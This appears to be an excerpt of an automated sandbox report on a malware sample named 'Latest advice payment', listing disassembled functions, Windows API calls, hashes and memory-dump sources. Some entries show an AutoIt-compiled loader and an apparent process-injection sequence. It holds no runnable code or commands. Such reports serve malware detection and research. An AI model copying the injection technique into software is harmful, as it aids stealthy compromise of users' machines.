                                                            • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                            • Instruction Fuzzy Hash: 17620C34A14218DBEB24CFA4C850BDEB775FF58300F5091A9D24DEB290E7B59E81CB59
                                                            Function 005C955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00564EE5: _fseek.LIBCMT ref: 00564EFD
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9824
                                                              • Part of subcall function 005C9734: _wcscmp.LIBCMT ref: 005C9837
                                                            • _free.LIBCMT ref: 005C96A2
                                                            • _free.LIBCMT ref: 005C96A9
                                                            • _free.LIBCMT ref: 005C9714
                                                              • Part of subcall function 00582D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00589A24), ref: 00582D69
                                                              • Part of subcall function 00582D55: GetLastError.KERNEL32(00000000,?,00589A24), ref: 00582D7B
                                                            • _free.LIBCMT ref: 005C971C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                            • String ID:
                                                            • API String ID: 1552873950-0
                                                            • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction ID: c08f6d838270e5b46a961074019688c698bb71479370ca228f235046d772f73e
                                                            • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                            • Instruction Fuzzy Hash: 955130B1904259AFDF249FA4CC85AAEBFB9FF88300F10449EF509A3251DB715A81CF58
                                                            Function 0058470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                            • String ID:
                                                            • API String ID: 2782032738-0
                                                            • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction ID: 28c147ff53fea984fe65674ab9ef4b2f41b6457a098b5cbbabd3d5bf9904c557
                                                            • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                            • Instruction Fuzzy Hash: A041D334A007479BDB18AF69C8849AE7FA6FF81364B24853DEC15E7680E770DD418F40
                                                            Function 00564C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: AU3!P/_$EA06
                                                            • API String ID: 4104443479-2811266698
                                                            • Opcode ID: cf7daa5ce89403e5c5236cba5eecc705286fb56a0f7dabbecf77fdc3568b9e95
                                                            • Instruction ID: 0de63c47243384358d670819e9d55d27158f04be36b13135e8adcba9fe509be3
                                                            • Opcode Fuzzy Hash: cf7daa5ce89403e5c5236cba5eecc705286fb56a0f7dabbecf77fdc3568b9e95
                                                            • Instruction Fuzzy Hash: 77415D31E041595BDF219B64CC657BF7FB6FB86300F684875ED829B382D6209D848FA2
                                                            Function 00567285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0059EA39
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0059EA83
                                                              • Part of subcall function 00564750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00564743,?,?,005637AE,?), ref: 00564770
                                                              • Part of subcall function 00580791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005807B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen_memset
                                                            • String ID: X
                                                            • API String ID: 3777226403-3081909835
                                                            • Opcode ID: abb1f2718e32c6f0f60e1163e3955e8119259dd9b2b1b9d1d69aba4d90f77401
                                                            • Instruction ID: ff2da7ccb698e46ead46ca08deec53f598085cde900116a32dc77dac0637efb6
                                                            • Opcode Fuzzy Hash: abb1f2718e32c6f0f60e1163e3955e8119259dd9b2b1b9d1d69aba4d90f77401
                                                            • Instruction Fuzzy Hash: D521A130A002599FCF51DF94C849AEE7FF9BF89314F044019E408AB281DFB45A898FA1
                                                            Function 005C98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 005C98F8
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 005C990F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: 4724c1a16bbc41fd5621d696e31547760689c3058ac531f30f7a8ac91daf1cf7
                                                            • Instruction ID: fa5af77767971be7508ec9dc6d548cb44af340cdbc2440ce384ef4e25a0c5dba
                                                            • Opcode Fuzzy Hash: 4724c1a16bbc41fd5621d696e31547760689c3058ac531f30f7a8ac91daf1cf7
                                                            • Instruction Fuzzy Hash: 1FD05E7954030DABDB509BA4DC8EFDA773CE714700F0002B1BB949A0A1EEB095989B91
                                                            Function 005DCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3b99995574b2fc70b61015a904c041c083c88d5167ddc4866d971e7ddfba9d6
                                                            • Instruction ID: 9c17053dca76a3b81d61f105be4552805fd1e29e1e40dafe6d09b5ba20df7511
                                                            • Opcode Fuzzy Hash: d3b99995574b2fc70b61015a904c041c083c88d5167ddc4866d971e7ddfba9d6
                                                            • Instruction Fuzzy Hash: 19F106716083429FCB24DF28C484A6ABBE5FF88314F54892EF8999B351D731E945CF92
                                                            Function 0056434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00564370
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00564415
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00564432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$_memset
                                                            • String ID:
                                                            • API String ID: 1505330794-0
                                                            • Opcode ID: 72b980c4e0fe8ec45f233fa4f3a752b8385baf22143ef21d0a5183a0eb5f2b73
                                                            • Instruction ID: 887aa99ce2a9fafe743e977c3cc3aec8e674e58af69b1fe8043d09b3020371b2
                                                            • Opcode Fuzzy Hash: 72b980c4e0fe8ec45f233fa4f3a752b8385baf22143ef21d0a5183a0eb5f2b73
                                                            • Instruction Fuzzy Hash: 81318070605B01CFC731DF24D88569BBFF8FB58309F00092EE59A87291E771A984CB52
                                                            Function 0058571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • __FF_MSGBANNER.LIBCMT ref: 00585733
                                                              • Part of subcall function 0058A16B: __NMSG_WRITE.LIBCMT ref: 0058A192
                                                              • Part of subcall function 0058A16B: __NMSG_WRITE.LIBCMT ref: 0058A19C
                                                            • __NMSG_WRITE.LIBCMT ref: 0058573A
                                                              • Part of subcall function 0058A1C8: GetModuleFileNameW.KERNEL32(00000000,006233BA,00000104,?,00000001,00000000), ref: 0058A25A
                                                              • Part of subcall function 0058A1C8: ___crtMessageBoxW.LIBCMT ref: 0058A308
                                                              • Part of subcall function 0058309F: ___crtCorExitProcess.LIBCMT ref: 005830A5
                                                              • Part of subcall function 0058309F: ExitProcess.KERNEL32 ref: 005830AE
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            • RtlAllocateHeap.NTDLL(01060000,00000000,00000001,00000000,?,?,?,00580DD3,?), ref: 0058575F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1372826849-0
                                                            • Opcode ID: 348f41b12e9052647d4e24959979c945bd46d9be57f30a4fbd36390876ff0bb3
                                                            • Instruction ID: 84e133b8c77d7425ec5fc9e48547af51bd2cf6a38829964c91cbcc5ba4abc62b
                                                            • Opcode Fuzzy Hash: 348f41b12e9052647d4e24959979c945bd46d9be57f30a4fbd36390876ff0bb3
                                                            • Instruction Fuzzy Hash: E201D231300A12DAE7253734EC8AB2A7F48FBC27A2F504826FD05FA281EF7499018760
                                                            Function 005C98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,005C9548,?,?,?,?,?,00000004), ref: 005C98BB
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,005C9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 005C98D1
                                                            • CloseHandle.KERNEL32(00000000,?,005C9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 005C98D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 6e602612cf61d9c956624314200a599c34839426915c40fa3770ee090e90ba98
                                                            • Instruction ID: 56541d809151aaed84f46c2e6690c7201a909d9e04610a6fc41a5a0277a893cc
                                                            • Opcode Fuzzy Hash: 6e602612cf61d9c956624314200a599c34839426915c40fa3770ee090e90ba98
                                                            • Instruction Fuzzy Hash: EBE08632140228BBD7251B94EC49FCA7F19AB16761F108120FB946D0E08BB11515A798
                                                            Function 005C8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 005C8D1B
                                                              • Part of subcall function 00582D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00589A24), ref: 00582D69
                                                              • Part of subcall function 00582D55: GetLastError.KERNEL32(00000000,?,00589A24), ref: 00582D7B
                                                            • _free.LIBCMT ref: 005C8D2C
                                                            • _free.LIBCMT ref: 005C8D3E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction ID: 68076e2b06fd173c1b257062e26ec5e6964edd42d2a51324351b83b2ebe0dee8
                                                            • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                            • Instruction Fuzzy Hash: 48E012B1602A024ACB24B5B8AA44FA31FEC6FD8352B14091DB80EE7186CE64FC438324
                                                            Function 0056A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CALL
                                                            • API String ID: 0-4196123274
                                                            • Opcode ID: c676e0c78b24744335755373d5d817ecf88510b547316d6cd9f00f23851eea0f
                                                            • Instruction ID: 74baafa22650fa9f7f81a67fb5d6d5b86cffcb5164f45dc1bad64db2374f311d
                                                            • Opcode Fuzzy Hash: c676e0c78b24744335755373d5d817ecf88510b547316d6cd9f00f23851eea0f
                                                            • Instruction Fuzzy Hash: 9E223670508242DFDB24DF14C494A6ABBE1BF85304F14896DF88A9B362DB35ED85DF82
                                                            Function 00567A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction ID: ccd0d0ebda328ac4130251cc1bf81efcd89262258acc08ba6e2fe02fa34a6de9
                                                            • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                            • Instruction Fuzzy Hash: 0A31B6B160460AAFC714DF68C8D1D69FBA9FF483147158629E919CB391EB30ED50CB90
                                                            Function 005647D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 00564834
                                                              • Part of subcall function 0058336C: __lock.LIBCMT ref: 00583372
                                                              • Part of subcall function 0058336C: DecodePointer.KERNEL32(00000001,?,00564849,005B7C74), ref: 0058337E
                                                              • Part of subcall function 0058336C: EncodePointer.KERNEL32(?,?,00564849,005B7C74), ref: 00583389
                                                              • Part of subcall function 005648FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00564915
                                                              • Part of subcall function 005648FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0056492A
                                                              • Part of subcall function 00563B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00563B68
                                                              • Part of subcall function 00563B3A: IsDebuggerPresent.KERNEL32 ref: 00563B7A
                                                              • Part of subcall function 00563B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006252F8,006252E0,?,?), ref: 00563BEB
                                                              • Part of subcall function 00563B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00563C6F
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00564874
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID:
                                                            • API String ID: 1438897964-0
                                                            • Opcode ID: 69dca8701db2d22c0a055146bbd737c5d878eb451f5049bf3990a04e6f2b4d55
                                                            • Instruction ID: e4971f4c0874c6c8bac14186ce7ff1b1848db9f6f3a063e623a4e6031b2212fd
                                                            • Opcode Fuzzy Hash: 69dca8701db2d22c0a055146bbd737c5d878eb451f5049bf3990a04e6f2b4d55
                                                            • Instruction Fuzzy Hash: 88118E71904742DBD720EF28DC4991ABFE9FBD4750F10891EF481972B1DB709649CB91
                                                            Function 00580DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0058571C: __FF_MSGBANNER.LIBCMT ref: 00585733
                                                              • Part of subcall function 0058571C: __NMSG_WRITE.LIBCMT ref: 0058573A
                                                              • Part of subcall function 0058571C: RtlAllocateHeap.NTDLL(01060000,00000000,00000001,00000000,?,?,?,00580DD3,?), ref: 0058575F
                                                            • std::exception::exception.LIBCMT ref: 00580DEC
                                                            • __CxxThrowException@8.LIBCMT ref: 00580E01
                                                              • Part of subcall function 0058859B: RaiseException.KERNEL32(?,?,?,00619E78,00000000,?,?,?,?,00580E06,?,00619E78,?,00000001), ref: 005885F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 3902256705-0
                                                            • Opcode ID: 53db336047fa4dc4eddeca19b16039f96fee81e5619bda36842c89d4d4a31a3c
                                                            • Instruction ID: a06733eccdbdc470ba4f20ee2b1d0e0316e178052fd935674637e4901b7e12b2
                                                            • Opcode Fuzzy Hash: 53db336047fa4dc4eddeca19b16039f96fee81e5619bda36842c89d4d4a31a3c
                                                            • Instruction Fuzzy Hash: 16F0D17150021E66CB10BAA4EC099EF7FACFF01350F000825FD05F6291DF709A8583D1
                                                            Function 005853A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00588B28: __getptd_noexit.LIBCMT ref: 00588B28
                                                            • __lock_file.LIBCMT ref: 005853EB
                                                              • Part of subcall function 00586C11: __lock.LIBCMT ref: 00586C34
                                                            • __fclose_nolock.LIBCMT ref: 005853F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: fcb91f0dab22ab33d185babec6153c066873494c057b54b74510ec69c57f2c70
                                                            • Instruction ID: 3973709dd12c382c7005a0bad847f7676f1b512e78605fd7b1ab9b64e1d8887b
                                                            • Opcode Fuzzy Hash: fcb91f0dab22ab33d185babec6153c066873494c057b54b74510ec69c57f2c70
                                                            • Instruction Fuzzy Hash: 58F09631801A069ADB117F6598097BD6EA0BF81375F658504EC64BB1C1DFBC8A415B51
                                                            Function 010A361D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 010A3DDB
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010A3E71
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010A3E93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                            • Instruction ID: c4d24525a44fa5818b7fa34aa3dd90750b911163c0203e3f251497d8e849b1b7
